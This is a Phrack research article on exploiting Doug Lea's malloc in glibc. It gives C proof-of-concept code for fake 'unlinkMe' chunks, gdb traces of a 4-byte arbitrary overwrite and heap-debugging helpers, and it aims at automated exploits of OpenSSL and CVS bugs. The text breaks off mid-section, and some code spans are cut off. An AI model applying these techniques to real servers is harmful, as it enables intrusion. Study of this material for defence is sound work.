==Phrack Inc.== Volume 0x0b, Issue 0x3d, Phile #0x06 of 0x0f |=--------------[ Advanced Doug lea's malloc exploits ]-----------------=| |=----------------------------------------------------------------------=| |=-----------------------[ jp ]-------------------------=| |=----------------------------------------------------------------------=| 1 - Abstract 2 - Introduction 3 - Automating exploitation problems 4 - The techniques 4.1 - aa4bmo primitive 4.1.1 - First unlinkMe chunk 4.1.1.1 - Proof of concept 1: unlinkMe chunk 4.1.2 - New unlinkMe chunk 4.2 - Heap layout analysis 4.2.1 - Proof of concept 2: Heap layout debugging 4.3 - Layout reset - initial layout prediction - server model 4.4 - Obtaining information from the remote process 4.4.1 - Modifying server static data - finding process' DATA 4.4.2 - Modifying user input - finding shellcode location 4.4.2.1 - Proof of concept 3 : Hitting the output 4.4.3 - Modifying user input - finding libc's data 4.4.3.1 - Proof of concept 4 : Freeing the output 4.4.4 - Vulnerability based heap memory leak - finding libc's DATA 4.5 - Abusing the leaked information 4.5.1 - Recognizing the arena 4.5.2 - Morecore 4.5.2.1 - Proof of concept 5 : Jumping with morecore 4.5.3 - Libc's GOT bruteforcing 4.5.3.1 - Proof of concept 6 : Hinted libc's GOT bruteforcing 4.5.4 - Libc fingerprinting 4.5.5 - Arena corruption (top, last remainder and bin modification) 4.6 - Copying the shellcode 'by hand' 5 - Conclusions 6 - Thanks 7 - References Appendix I - malloc internal structures overview --------------------------------------------------------------------------- --[ 1. Abstract This paper details several techniques that allow more generic and reliable exploitation of processes that provide us with the ability to overwrite an almost arbitrary 4 byte value at any location. Higher level techniques will be constructed on top of the unlink() basic technique (presented in MaXX's article [2]) to exploit processes which allow an attacker to corrupt Doug Lea's malloc (Linux default's dynamic memory allocator). unlink() is used to force specific information leaks of the target process memory layout. The obtained information is used to exploit the target without any prior knowledge or hardcoded values, even when randomization of main object's and/or libraries' load address is present. Several tricks will be presented along different scenarios, including: * special chunks crafting (cushion chunk and unlinkMe chunk) * heap layout consciousness and analysis using debugging tools * automatically finding the injected shellcode in the process memory * forcing a remote process to provide malloc's internal structures addresses * looking for a function pointer within glibc * injecting the shellcode into a known memory address The combination of these techniques allows to exploit the OpenSSL 'SSLv2 Malformed Client Key Buffer Overflow' [6] and the CVS 'Directory double free' [7] vulnerabilities in a fully automated way (without hardcoding any target based address or offset), for example. --------------------------------------------------------------------------- --[ 2. Introduction Given a vulnerability which allows us to corrupt malloc's internal structures (i.e. heap overflow, double free(), etc), we can say it 'provides' us with the ability to perform at least an 'almost arbitrary 4 bytes mirrored overwrite' primitive (aa4bmo from now on). We say it's a 'mirrored' overwrite as the location we are writing at minus 8 will be stored in the address given by the value we are writing plus 12. Note we say almost arbitrary as we can only write values that are writable, as a side effect of the mirrored copy. The 'primitive' concept was previously introduced in the 'Advances in format string exploitation' paper [4] and in the 'About exploits writing' presentation [5]. Previous work 'Vudo - An object superstitiously believed to embody magical power' by Michel 'MaXX' Kaempf [2] and 'Once upon a free()' [3] give fully detailed explanations on how to obtain the aa4bmo primitive from a vulnerability. At [8] and [9] can be found the first examples of malloc based exploitation. We'll be using the unlink() technique from [2] as the basic lower level mechanism to obtain the aa4bmo primitive, which we'll use through all the paper to build higher level techniques. malloc higher vulnerability -> structures -> primitive -> level corruption techniques --------------------------------------------------------------------------- heap overflow unlink() freeing the output double free() -> technique -> aa4bmo -> hitting the output ... cushion chunk ... This paper focuses mainly on the question that arises after we reach the aa4bmo primitive: what should we do once we know a process allows us to overwrite four bytes of its memory with almost any arbitrary data? In addition, tips to reach the aa4bmo primitive in a reliable way are explained. Although the techniques are presented in the context of malloc based heap overflow exploitation, they can be employed to aid in format string exploits as well, for example, or any other vulnerability or combination of them, which provide us with similar capabilities. The research was focused on the Linux/Intel platform; glibc-2.2.4, glibc-2.2.5 and glibc-2.3 sources were used, mainly the file malloc.c (an updated version of malloc can be found at [1]). Along this paper we'll use 'malloc' to refer to Doug Lea's malloc based implementation. --------------------------------------------------------------------------- --] 3. Automating exploitation problems When trying to answer the question 'what should we do once we know we can overwrite four bytes of the process memory with almost any arbitrary data?', we face several problems: A] how can we be sure we are overwriting the desired bytes with the desired bytes? As the aa4bmo primitive is the underlying layer that allows us to implement the higher level techniques, we need to be completely sure it is working as expected, even when we know we won't know where our data will be located. Also, in order to be useful, the primitive should not crash the exploited process. B] what should we write? We may write the address of the code we intend to execute, or we may modify a process variable. In case we inject our shellcode in the process, we need to know its location, which may vary together with the evolving process heap/stack layout. C] where should we write? Several known locations can be overwritten to modify the execution flow, including for example the ones shown in [10], [11], [12] and [14]. In case we are overwriting a function pointer (as when overwriting a stack frame, GOT entry, process specific function pointer, setjmp/longjmp, file descriptor function pointer, etc), we need to know its precise location. The same happens if we plan to overwrite a process variable. For example, a GOT entry address may be different even when the source code is the same, as compilation and linking parameters may yield a different process layout, as happens with the same program source code compiled for different Linux distributions. Along this paper, our examples will be oriented at overwriting a function pointer with the address of injected shellcode. However, some techniques also apply to other cases. Typical exploits are target based, hardcoding at least one of the values required for exploitation, such as the address of a given GOT entry, depending on the targeted daemon version and the Linux distribution and release version. Although this simplifies the exploitation process, it is not always feasible to obtain the required information (i.e. a server can be configured to lie or to not disclose its version number). Besides, we may not have the needed information for the target. Bruteforcing more than one exploit parameter may not always be possible, if each of the values can't be obtained separately. There are some well known techniques used to improve the reliability (probability of success) of a given exploit, but they are only an aid for improving the exploitation chances. For example, we may pad the shellcode with more nops, we may also inject a larger quantity of shellcode in the process (depending on the process being exploited) inferring there are more possibilities of hitting it that way. Although these enhancements will improve the reliability of our exploit, they are not enough for an exploit to work always on any vulnerable target. In order to create a fully reliable exploit, we'll need to obtain both the address where our shellcode gets injected and the address of any function pointer to overwrite. In the following, we discuss how these requirements may be accomplished in an automated way, without any prior knowledge of the target server. Most of the article details how we can force a remote process to leak the required information using aa4bmo primitive. --------------------------------------------------------------------------- --] 4. The techniques --] 4.1 aa4bmo primitive --] 4.1.1 First unlinkMe chunk In order to be sure that our primitive is working as expected, even in scenarios where we are not able to fully predict the location of our injected fake chunk, we build the following 'unlinkMe chunk': -4 -4 what where-8 -11 -15 -19 ... |--------|--------|--------|--------|--------|--------|--------|... sizeB sizeA FD BK ----------- nasty chunk -----------|--------|--------------------> (X) We just need a free() call to hit our block after the (X) point to overwrite 'where' with 'what'. When free() is called the following sequence takes place: - chunk_free() tries to look for the next chunk, it takes the chunk's size (<0) and adds it to the chunk address, obtaining always the sizeA of the 'nasty chunk' as the start of the next chunk, as all the sizes after the (X) are relative to it. - Then, it checks the prev_inuse bit of our chunk, but as we set it (each of the sizes after the (X) point has the prev_inuse bit set, the IS_MMAPPED bit is not set) it does not try to backward consolidate (because the previous chunk 'seems' to be allocated). - Finally, it checks if the fake next chunk (our nasty chunk) is free. It takes its size (-4) to look for the next chunk, obtaining our fake sizeB, and checks for the prev_inuse flag, which is not set. So, it tries to unlink our nasty chunk from its bin to coalesce it with the chunk being freed. - When unlink() is called, we get the aa4bmo primitive. The unlink() technique is described in [2] and [3]. --] 4.1.1.1 Proof of concept 1: unlinkMe chunk We'll use the following code to show in a simple way the unlinkMe chunk in action: #define WHAT_2_WRITE 0xbfffff00 #define WHERE_2_WRITE 0xbfffff00 #define SZ 256 #define SOMEOFFSET 5 + (rand() % (SZ-1)) #define PREV_INUSE 1 #define IS_MMAP 2 int main(void){ unsigned long *unlinkMe=(unsigned long*)malloc(SZ*sizeof(unsigned long)); int i = 0; unlinkMe[i++] = -4; unlinkMe[i++] = -4; unlinkMe[i++] = WHAT_2_WRITE; unlinkMe[i++] = WHERE_2_WRITE-8; for(;imutex); 3205 chunk_free(ar_ptr, p); After some checks, we reach chunk_free(). (gdb) s chunk_free (ar_ptr=0x40018040, p=0x8049874) at heapy.c:3221 Let's see how does our chunk looks at a random location... (gdb) x/20x p 0x8049874: 0xfffffd71 0xfffffd6d 0xfffffd69 0xfffffd65 0x8049884: 0xfffffd61 0xfffffd5d 0xfffffd59 0xfffffd55 0x8049894: 0xfffffd51 0xfffffd4d 0xfffffd49 0xfffffd45 0x80498a4: 0xfffffd41 0xfffffd3d 0xfffffd39 0xfffffd35 0x80498b4: 0xfffffd31 0xfffffd2d 0xfffffd29 0xfffffd25 We dumped the chunk including its header, as received by chunk_free(). 3221 INTERNAL_SIZE_T hd = p->size; /* its head field */ 3235 sz = hd & ~PREV_INUSE; (gdb) p/x hd $5 = 0xfffffd6d (gdb) p/x sz $6 = 0xfffffd6c 3236 next = chunk_at_offset(p, sz); 3237 nextsz = chunksize(next); Using the negative relative size, chunk_free() gets the next chunk, let's see which is the 'next' chunk: (gdb) x/20x next 0x80495e0: 0xfffffffc 0xfffffffc 0xbfffff00 0xbffffef8 0x80495f0: 0xfffffff5 0xfffffff1 0xffffffed 0xffffffe9 0x8049600: 0xffffffe5 0xffffffe1 0xffffffdd 0xffffffd9 0x8049610: 0xffffffd5 0xffffffd1 0xffffffcd 0xffffffc9 0x8049620: 0xffffffc5 0xffffffc1 0xffffffbd 0xffffffb9 (gdb) p/x nextsz $7 = 0xfffffffc It's our nasty chunk... 3239 if (next == top(ar_ptr)) /* merge with top */ 3278 islr = 0; 3280 if (!(hd & PREV_INUSE)) /* consolidate backward */ We avoid the backward consolidation, as we set the PREV_INUSE bit. 3294 if (!(inuse_bit_at_offset(next, nextsz))) /* consolidate forward */ But we force a forward consolidation. The inuse_bit_at_offset() macro adds nextsz (-4) to our nasty chunk's address, and looks for the PREV_INUSE bit in our other -4 size. 3296 sz += nextsz; 3298 if (!islr && next->fd == last_remainder(ar_ptr)) 3306 unlink(next, bck, fwd); unlink() is called with our supplied values: 0xbffffef8 and 0xbfffff00 as forward and backward pointers (it does not crash, as they are valid addresses). next = chunk_at_offset(p, sz); 3315 set_head(p, sz | PREV_INUSE); 3316 next->prev_size = sz; 3317 if (!islr) { 3318 frontlink(ar_ptr, p, sz, idx, bck, fwd); fronlink() is called and our chunk is inserted in the proper bin. --- BIN DUMP --- arena @ 0x40018040 - top @ 0x8049a40 - top size = 0x05c0 bin 126 @ 0x40018430 free_chunk @ 0x80498d8 - size 0xfffffd64 The chunk was inserted into one of the bigger bins... as a consequence of its 'negative' size. The process won't crash if we are able to maintain this state. If more calls to free() hit our chunk, it won't crash. But it will crash in case a malloc() call does not find any free chunk to satisfy the allocation requirement and tries to split one of the bins in the bin number 126, as it will try to calculate where is the chunk after the fake one, getting out of the valid address range because of the big 'negative' size (this may not happen in a scenario where there is enough memory allocated between the fake chunk and the top chunk, forcing this layout is not very difficult when the target server does not impose tight limits to our requests size). We can check the results of the aa4bmo primitive: (gdb) x/20x 0xbfffff00 !!!!!!!!!! !!!!!!!!!! 0xbfffff00: 0xbfffff00 0x414c0065 0x653d474e 0xbffffef8 0xbfffff10: 0x6f73692e 0x39353838 0x53003531 0x415f4853 0xbfffff20: 0x41504b53 0x2f3d5353 0x2f727375 0x6562696c 0xbfffff30: 0x2f636578 0x6e65706f 0x2f687373 0x6d6f6e67 0xbfffff40: 0x73732d65 0x73612d68 0x7361706b 0x4f480073 If we add some bogus calls to free() in the following way: for(i=0;i<5;i++) free(unlinkMe+SOMEOFFSET); we obtain the following result for example: --- BIN DUMP --- arena @ 0x40018040 - top @ 0x8049ac0 - top size = 0x0540 bin 126 @ 0x40018430 free_chunk @ 0x8049958 - size 0x8049958 free_chunk @ 0x8049954 - size 0xfffffd68 free_chunk @ 0x8049928 - size 0xfffffd94 free_chunk @ 0x8049820 - size 0x40018430 free_chunk @ 0x80499c4 - size 0xfffffcf8 free_chunk @ 0x8049818 - size 0xfffffea4 without crashing the process. --] 4.1.2 New unlinkMe chunk Changes introduced in newer libc versions (glibc-2.3 for example) affect our unlinkMe chunk. The main problem for us is related to the addition of one flag bit more. SIZE_BITS definition was modified, from: #define SIZE_BITS (PREV_INUSE|IS_MMAPPED) to: #define SIZE_BITS (PREV_INUSE|IS_MMAPPED|NON_MAIN_ARENA) The new flag, NON_MAIN_ARENA is defined like this: /* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained from a non-main arena. This is only set immediately before handing the chunk to the user, if necessary. */ #define NON_MAIN_ARENA 0x4 This makes our previous unlinkMe chunk to fail in two different points in systems using a newer libc. Our first problem is located within the following code: public_fREe(Void_t* mem) { ... ar_ptr = arena_for_chunk(p); ... _int_free(ar_ptr, mem); ... where: #define arena_for_chunk(ptr) \ (chunk_non_main_arena(ptr) ? heap_for_ptr(ptr)->ar_ptr : &main_arena) and /* check for chunk from non-main arena */ #define chunk_non_main_arena(p) ((p)->size & NON_MAIN_ARENA) If heap_for_ptr() is called when processing our fake chunk, the process crashes in the following way: 0x42074a04 in free () from /lib/i686/libc.so.6 1: x/i $eip 0x42074a04 : and $0x4,%edx (gdb) x/20x $edx 0xffffffdd: Cannot access memory at address 0xffffffdd 0x42074a07 in free () from /lib/i686/libc.so.6 1: x/i $eip 0x42074a07 : je 0x42074a52 0x42074a09 in free () from /lib/i686/libc.so.6 1: x/i $eip 0x42074a09 : and $0xfff00000,%eax 0x42074a0e in free () from /lib/i686/libc.so.6 1: x/i $eip 0x42074a0e : mov (%eax),%edi (gdb) x/x $eax 0x8000000: Cannot access memory at address 0x8000000 Program received signal SIGSEGV, Segmentation fault. 0x42074a0e in free () from /lib/i686/libc.so.6 1: x/i $eip 0x42074a0e : mov (%eax),%edi So, the fake chunk size has to have its NON_MAIN_ARENA flag not set. Then, our second problem takes places when the supplied size is masked with the SIZE_BITS. Older code looked like this: nextsz = chunksize(next); 0x400152e2 : mov 0x4(%edx),%ecx 0x400152e5 : and $0xfffffffc,%ecx and new code is: nextsize = chunksize(nextchunk); 0x42073fe0 <_int_free+112>: mov 0x4(%ecx),%eax 0x42073fe3 <_int_free+115>: mov %ecx,0xffffffec(%ebp) 0x42073fe6 <_int_free+118>: mov %eax,0xffffffe4(%ebp) 0x42073fe9 <_int_free+121>: and $0xfffffff8,%eax So, we can't use -4 anymore, the smaller size we can provide is -8. Also, we are not able anymore to make every chunk to point to our nasty chunk. The following code shows our new unlinkMe chunk which solves both problems: unsigned long *aa4bmoPrimitive(unsigned long what, unsigned long where,unsigned long sz){ unsigned long *unlinkMe; int i=0; if(sz<13) sz = 13; unlinkMe=(unsigned long*)malloc(sz*sizeof(unsigned long)); // 1st nasty chunk unlinkMe[i++] = -4; // PREV_INUSE is not set unlinkMe[i++] = -4; unlinkMe[i++] = -4; unlinkMe[i++] = what; unlinkMe[i++] = where-8; // 2nd nasty chunk unlinkMe[i++] = -4; // PREV_INUSE is not set unlinkMe[i++] = -4; unlinkMe[i++] = -4; unlinkMe[i++] = what; unlinkMe[i++] = where-8; for(;isize); if(p == top(ar_ptr)) { fprintf(stderr, " (T)\n"); break; } else if(p->size == (0|PREV_INUSE)) { fprintf(stderr, " (Z)\n"); break; } if(inuse(p)) fprintf(stderr," (A)"); else fprintf(stderr," (F) | 0x%8x | 0x%8x |",p->fd,p->bk); if((p->fd==last_remainder(ar_ptr))&&(p->bk==last_remainder(ar_ptr))) fprintf(stderr," (LR)"); else if(p->fd==p->bk & ~inuse(p)) fprintf(stderr," (LC)"); fprintf(stderr,"\n"); p = next_chunk(p); } fprintf(stderr,"sbrk_end %p\n",sbrk_base+sbrked_mem); } static void #if __STD_C heap_layout(arena *ar_ptr) #else heap_layout(ar_ptr) arena *ar_ptr; #endif { mchunkptr p; fprintf(stderr,"\n--- HEAP LAYOUT ---\n"); p = (mchunkptr)(((unsigned long)sbrk_base + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK); for(;;p=next_chunk(p)) { if(p==top(ar_ptr)) { fprintf(stderr,"|T|\n\n"); break; } if((p->fd==last_remainder(ar_ptr))&&(p->bk==last_remainder(ar_ptr))) { fprintf(stderr,"|L|"); continue; } if(inuse(p)) { fprintf(stderr,"|A|"); continue; } fprintf(stderr,"|%lu|",bin_index(p->size)); continue; } } } static void #if __STD_C bin_dump(arena *ar_ptr) #else bin_dump(ar_ptr) arena *ar_ptr; #endif { int i; mbinptr b; mchunkptr p; fprintf(stderr,"\n--- BIN DUMP ---\n"); (void)mutex_lock(&ar_ptr->mutex); fprintf(stderr,"arena @ %p - top @ %p - top size = 0x%.4x\n", ar_ptr,top(ar_ptr),chunksize(top(ar_ptr))); for (i = 1; i < NAV; ++i) { char f = 0; b = bin_at(ar_ptr, i); for (p = last(b); p != b; p = p->bk) { if(!f){ f = 1; fprintf(stderr," bin %d @ %p\n",i,b); } fprintf(stderr," free_chunk @ %p - size 0x%.4x\n", p,chunksize(p)); } (void)mutex_unlock(&ar_ptr->mutex); fprintf(stderr,"\n"); } --] 4.2.1 Proof of concept 2: Heap layout debugging We'll use the following code to show how the debug functions help to analyse the heap layout: #include int main(void){ void *curly,*larry,*moe,*po,*lala,*dipsi,*tw,*piniata; curly = malloc(256); larry = malloc(256); moe = malloc(256); po = malloc(256); lala = malloc(256); free(larry); free(po); tw = malloc(128); piniata = malloc(128); dipsi = malloc(1500); free(dipsi); free(lala); } The sample debugging section helps to understand malloc's basic algorithms and data structures: (gdb) set env LD_PRELOAD ./heapy.so We override the real malloc with our debugging functions, heapy.so also includes the heap layout dumping functions. (gdb) r Starting program: /home/jp/cerebro/heapy/debugging_sample 4 curly = malloc(256); [1679] MALLOC(256) - CHUNK_ALLOC(0x40018040,264) extended top chunk: previous size 0x0 new top 0x80496a0 size 0x961 returning 0x8049598 from top chunk (gdb) p heap_dump(0x40018040) --- HEAP DUMP --- ADDRESS SIZE FD BK sbrk_base 0x8049598 chunk 0x8049598 0x0109 (A) chunk 0x80496a0 0x0961 (T) sbrk_end 0x804a000 (gdb) p bin_dump(0x40018040) --- BIN DUMP --- arena @ 0x40018040 - top @ 0x80496a0 - top size = 0x0960 (gdb) p heap_layout(0x40018040) --- HEAP LAYOUT --- |A||T| The first chunk is allocated, note the difference between the requested size (256 bytes) and the size passed to chunk_alloc(). As there is no chunk, the top needs to be extended and memory is requested to the operating system. More memory than the needed is requested, the remaining space is allocated to the 'top chunk'. In the heap_dump()'s output the (A) represents an allocated chunk, while the (T) means the chunk is the top one. Note the top chunk's size (0x961) has its last bit set, indicating the previous chunk is allocated: /* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */ #define PREV_INUSE 0x1UL The bin_dump()'s output shows no bin, as there is no free chunk yet, except from the top. The heap_layout()'s output just shows an allocated chunk next to the top. 5 larry = malloc(256); [1679] MALLOC(256) - CHUNK_ALLOC(0x40018040,264) returning 0x80496a0 from top chunk new top 0x80497a8 size 0x859 --- HEAP DUMP --- ADDRESS SIZE FD BK sbrk_base 0x8049598 chunk 0x8049598 0x0109 (A) chunk 0x80496a0 0x0109 (A) chunk 0x80497a8 0x0859 (T) sbrk_end 0x804a000 --- BIN DUMP --- arena @ 0x40018040 - top @ 0x80497a8 - top size = 0x0858 --- HEAP LAYOUT --- |A||A||T| A new chunk is allocated from the remaining space at the top chunk. The same happens with the next malloc() calls. 6 moe = malloc(256); [1679] MALLOC(256) - CHUNK_ALLOC(0x40018040,264) returning 0x80497a8 from top chunk new top 0x80498b0 size 0x751 --- HEAP DUMP --- ADDRESS SIZE FD BK sbrk_base 0x8049598 chunk 0x8049598 0x0109 (A) chunk 0x80496a0 0x0109 (A) chunk 0x80497a8 0x0109 (A) chunk 0x80498b0 0x0751 (T) sbrk_end 0x804a000 --- BIN DUMP --- arena @ 0x40018040 - top @ 0x80498b0 - top size = 0x0750 --- HEAP LAYOUT --- |A||A||A||T| 7 po = malloc(256); [1679] MALLOC(256) - CHUNK_ALLOC(0x40018040,264) returning 0x80498b0 from top chunk new top 0x80499b8 size 0x649 --- HEAP DUMP --- ADDRESS SIZE FD BK sbrk_base 0x8049598 chunk 0x8049598 0x0109 (A) chunk 0x80496a0 0x0109 (A) chunk 0x80497a8 0x0109 (A) chunk 0x80498b0 0x0109 (A) chunk 0x80499b8 0x0649 (T) sbrk_end 0x804a000 --- BIN DUMP --- arena @ 0x40018040 - top @ 0x80499b8 - top size = 0x0648 --- HEAP LAYOUT --- |A||A||A||A||T| 8 lala = malloc(256); [1679] MALLOC(256) - CHUNK_ALLOC(0x40018040,264) returning 0x80499b8 from top chunk new top 0x8049ac0 size 0x541 --- HEAP DUMP --- ADDRESS SIZE FD BK sbrk_base 0x8049598 chunk 0x8049598 0x0109 (A) chunk 0x80496a0 0x0109 (A) chunk 0x80497a8 0x0109 (A) chunk 0x80498b0 0x0109 (A) chunk 0x80499b8 0x0109 (A) chunk 0x8049ac0 0x0541 (T) sbrk_end 0x804a000 --- BIN DUMP --- arena @ 0x40018040 - top @ 0x8049ac0 - top size = 0x0540 --- HEAP LAYOUT --- |A||A||A||A||A||T| 9 free(larry); [1679] FREE(0x80496a8) - CHUNK_FREE(0x40018040,0x80496a0) fronlink(0x80496a0,264,33,0x40018148,0x40018148) new free chunk --- HEAP DUMP --- ADDRESS SIZE FD BK sbrk_base 0x8049598 chunk 0x8049598 0x0109 (A) chunk 0x80496a0 0x0109 (F) | 0x40018148 | 0x40018148 | (LC) chunk 0x80497a8 0x0108 (A) chunk 0x80498b0 0x0109 (A) chunk 0x80499b8 0x0109 (A) chunk 0x8049ac0 0x0541 (T) sbrk_end 0x804a000 --- BIN DUMP --- arena @ 0x40018040 - top @ 0x8049ac0 - top size = 0x0540 bin 33 @ 0x40018148 free_chunk @ 0x80496a0 - size 0x0108 --- HEAP LAYOUT --- |A||33||A||A||A||T| A chunk is freed. The frontlink() macro is called to insert the new free chunk into the corresponding bin: frontlink(ar_ptr, new_free_chunk, size, bin_index, bck, fwd); Note the arena address parameter (ar_ptr) was omitted in the output. In this case, the chunk at 0x80496a0 was inserted in the bin number 33 according to its size. As this chunk is the only one in its bin (we can check this in the bin_dump()'s output), it's a lonely chunk (LC) (we'll see later that being lonely makes 'him' dangerous...), its bk and fd pointers are equal and point to the bin number 33. In the heap_layout()'s output, the new free chunk is represented by the number of the bin where it is located. 10 free(po); [1679] FREE(0x80498b8) - CHUNK_FREE(0x40018040,0x80498b0) fronlink(0x80498b0,264,33,0x40018148,0x80496a0) new free chunk --- HEAP DUMP --- ADDRESS SIZE FD BK sbrk_base 0x8049598 chunk 0x8049598 0x0109 (A) chunk 0x80496a0 0x0109 (F) | 0x40018148 | 0x080498b0 | chunk 0x80497a8 0x0108 (A) chunk 0x80498b0 0x0109 (F) | 0x080496a0 | 0x40018148 | chunk 0x80499b8 0x0108 (A) chunk 0x8049ac0 0x0541 (T) sbrk_end 0x804a000 --- BIN DUMP --- arena @ 0x40018040 - top @ 0x8049ac0 - top size = 0x0540 bin 33 @ 0x40018148 free_chunk @ 0x80496a0 - size 0x0108 free_chunk @ 0x80498b0 - size 0x0108 --- HEAP LAYOUT --- |A||33||A||33||A||T| Now, we have two free chunks in the bin number 33. We can appreciate now how the double linked list is built. The forward pointer of the chunk at 0x80498b0 points to the other chunk in the list, the backward pointer points to the list head, the bin. Note that there is no longer a lonely chunk. Also, we can see the difference between a heap address and a libc address (the bin address), 0x080496a0 and 0x40018148 respectively. 11 tw = malloc(128); [1679] MALLOC(128) - CHUNK_ALLOC(0x40018040,136) unlink(0x80496a0,0x80498b0,0x40018148) from big bin 33 chunk 1 (split) new last_remainder 0x8049728 --- HEAP DUMP --- ADDRESS SIZE FD BK sbrk_base 0x8049598 chunk 0x8049598 0x0109 (A) chunk 0x80496a0 0x0089 (A) chunk 0x8049728 0x0081 (F) | 0x40018048 | 0x40018048 | (LR) chunk 0x80497a8 0x0108 (A) chunk 0x80498b0 0x0109 (F) | 0x40018148 | 0x40018148 | (LC) chunk 0x80499b8 0x0108 (A) chunk 0x8049ac0 0x0541 (T) sbrk_end 0x804a000 --- BIN DUMP --- arena @ 0x40018040 - top @ 0x8049ac0 - top size = 0x0540 bin 1 @ 0x40018048 free_chunk @ 0x8049728 - size 0x0080 bin 33 @ 0x40018148 free_chunk @ 0x80498b0 - size 0x0108 --- HEAP LAYOUT --- |A||A||L||A||33||A||T| In this case, the requested size for the new allocation is smaller than the size of the available free chunks. So, the first freed buffer is taken from the bin with the unlink() macro and splitted. The first part is allocated, the remaining free space is called the 'last remainder', which is always stored in the first bin, as we can see in the bin_dump()'s output. In the heap_layout()'s output, the last remainder chunk is represented with a L; in the heap_dump()'s output, (LR) is used. 12 piniata = malloc(128); [1679] MALLOC(128) - CHUNK_ALLOC(0x40018040,136) clearing last_remainder frontlink(0x8049728,128,16,0x400180c0,0x400180c0) last_remainder unlink(0x80498b0,0x40018148,0x40018148) from big bin 33 chunk 1 (split) new last_remainder 0x8049938 --- HEAP DUMP --- ADDRESS SIZE FD BK sbrk_base 0x8049598 chunk 0x8049598 0x0109 (A) chunk 0x80496a0 0x0089 (A) chunk 0x8049728 0x0081 (F) | 0x400180c0 | 0x400180c0 | (LC) chunk 0x80497a8 0x0108 (A) chunk 0x80498b0 0x0089 (A) chunk 0x8049938 0x0081 (F) | 0x40018048 | 0x40018048 | (LR) chunk 0x80499b8 0x0108 (A) chunk 0x8049ac0 0x0541 (T) sbrk_end 0x804a000 $25 = void --- BIN DUMP --- arena @ 0x40018040 - top @ 0x8049ac0 - top size = 0x0540 bin 1 @ 0x40018048 free_chunk @ 0x8049938 - size 0x0080 bin 16 @ 0x400180c0 free_chunk @ 0x8049728 - size 0x0080 --- HEAP LAYOUT --- |A||A||16||A||A||L||A||T| As the last_remainder size is not enough for the requested allocation, the last remainder is cleared and inserted as a new free chunk into the corresponding bin. Then, the other free chunk is taken from its bin and split as in the previous step. 13 dipsi = malloc(1500); [1679] MALLOC(1500) - CHUNK_ALLOC(0x40018040,1504) clearing last_remainder frontlink(0x8049938,128,16,0x400180c0,0x8049728) last_remainder extended top chunk: previous size 0x540 new top 0x804a0a0 size 0xf61 returning 0x8049ac0 from top chunk --- HEAP DUMP --- ADDRESS SIZE FD BK sbrk_base 0x8049598 chunk 0x8049598 0x0109 (A) chunk 0x80496a0 0x0089 (A) chunk 0x8049728 0x0081 (F) | 0x400180c0 | 0x08049938 | chunk 0x80497a8 0x0108 (A) chunk 0x80498b0 0x0089 (A) chunk 0x8049938 0x0081 (F) | 0x08049728 | 0x400180c0 | chunk 0x80499b8 0x0108 (A) chunk 0x8049ac0 0x05e1 (A) chunk 0x804a0a0 0x0f61 (T) sbrk_end 0x804b000 --- BIN DUMP --- arena @ 0x40018040 - top @ 0x804a0a0 - top size = 0x0f60 bin 16 @ 0x400180c0 free_chunk @ 0x8049728 - size 0x0080 free_chunk @ 0x8049938 - size 0x0080 --- HEAP LAYOUT --- |A||A||16||A||A||16||A||A||T| As no available free chunk is enough for the requested allocation size, the top chunk was extended again. 14 free(dipsi); [1679] FREE(0x8049ac8) - CHUNK_FREE(0x40018040,0x8049ac0) merging with top new top 0x8049ac0 --- HEAP DUMP --- ADDRESS SIZE FD BK sbrk_base 0x8049598 chunk 0x8049598 0x0109 (A) chunk 0x80496a0 0x0089 (A) chunk 0x8049728 0x0081 (F) | 0x400180c0 | 0x08049938 | chunk 0x80497a8 0x0108 (A) chunk 0x80498b0 0x0089 (A) chunk 0x8049938 0x0081 (F) | 0x 8049728 | 0x400180c0 | chunk 0x80499b8 0x0108 (A) chunk 0x8049ac0 0x1541 (T) sbrk_end 0x804b000 --- BIN DUMP --- arena @ 0x40018040 - top @ 0x8049ac0 - top size = 0x1540 bin 16 @ 0x400180c0 free_chunk @ 0x8049728 - size 0x0080 free_chunk @ 0x8049938 - size 0x0080 --- HEAP LAYOUT --- |A||A||16||A||A||16||A||T| The chunk next to the top chunk is freed, so it gets coalesced with it, and it is not inserted in any bin. 15 free(lala); [1679] FREE(0x80499c0) - CHUNK_FREE(0x40018040,0x80499b8) unlink(0x8049938,0x400180c0,0x8049728) for back consolidation merging with top new top 0x8049938 --- HEAP DUMP --- ADDRESS SIZE FD BK sbrk_base 0x8049598 chunk 0x8049598 0x0109 (A) chunk 0x80496a0 0x0089 (A) chunk 0x8049728 0x0081 (F) | 0x400180c0 | 0x400180c0 | (LC) chunk 0x80497a8 0x0108 (A) chunk 0x80498b0 0x0089 (A) chunk 0x8049938 0x16c9 (T) sbrk_end 0x804b000 --- BIN DUMP --- arena @ 0x40018040 - top @ 0x8049938 - top size = 0x16c8 bin 16 @ 0x400180c0 free_chunk @ 0x8049728 - size 0x0080 --- HEAP LAYOUT --- |A||A||16||A||A||T| Again, but this time also the chunk before the freed chunk is coalesced, as it was already free. --------------------------------------------------------------------------- --] 4.3 - Layout reset - initial layout prediction - server model In this section, we analyse how different scenarios may impact on the exploitation process. In case of servers that get restarted, it may be useful to cause a 'heap reset', which means crashing the process on purpose in order to obtain a clean and known initial heap layout. The new heap that gets built together with the new restarted process is in its 'initial layout'. This refers to the initial state of the heap after the process initialization, before receiving any input from the user. The initial layout can be easily predicted and used as a the known starting point for the heap layout evolution prediction, instead of using a not virgin layout result of several modifications performed while serving client requests. This initial layout may not vary much across different versions of the targeted server, but in case of major changes in the source code. One issue very related to the heap layout analysis is the kind of process being exploited. In case of a process that serves several clients, heap layout evolution prediction is harder, as may be influenced by other clients that may be interacting with our target server while we are trying to exploit it. However, it gets useful in case where the interaction between the server and the client is very restricted, as it enables the attacker to open multiple connections to affect the same process with different input commands. On the other hand, exploiting a one client per process server (i.e. a forking server) is easier, as long as we can accurately predict the initial heap layout and we are able to populate the process memory in a fully controlled way. As it is obvious, a server that does not get restarted, gives us just one shot so, for example, bruteforcing and/or 'heap reset' can't be applied. --------------------------------------------------------------------------- --] 4.4 Obtaining information from the remote process The idea behind the techniques in this section is to force a remote server to give us information to aid us in finding the memory locations needed for exploitation. This concept was already used as different mechanisms in the 'Bypassing PaX ASLR' paper [13], used to bypass randomized space address processes. Also, the idea was suggested in [4], as 'transforming a write primitive in a read primitive'. --] 4.4.1 Modifying server static data - finding process' DATA This technique was originally seen in wuftpd ~{ exploits. When the ftpd process receives a 